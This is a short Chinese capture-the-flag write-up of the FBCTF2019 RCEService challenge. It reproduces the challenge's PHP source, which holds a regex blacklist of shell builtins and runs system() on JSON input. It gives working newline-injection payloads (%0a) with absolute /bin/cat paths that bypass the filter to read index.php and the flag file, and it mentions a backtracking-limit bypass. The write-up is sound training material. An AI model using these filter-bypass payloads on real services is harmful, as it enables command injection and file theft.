[FBCTF2019]RCEService
绕过正则
随便输一下Json格式的东西
发现了get方式的cmd参数
然后{"cmd":"ls /"}没回显应该是被过滤了
{"cmd":"ls"}
正则函数preg_match
只能匹配第一行
Linux中cat命令实际是在bin中
?cmd={%0a"cmd":"/bin/cat index.php"%0a}
查看源代码先
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
putenv('PATH=/home/rceservice/jail');
这行代码的作用是在当前运行的程序中临时修改环境变量 PATH 的值为 /home/rceservice/jail。
本来只是想看看环境变量没想到直接就getflag
了
?cmd={%0a"cmd":"/bin/cat /home/rceservice/flag"%0a}
利用回溯次数来绕过函数
P师傅的文章
脚本后面写吧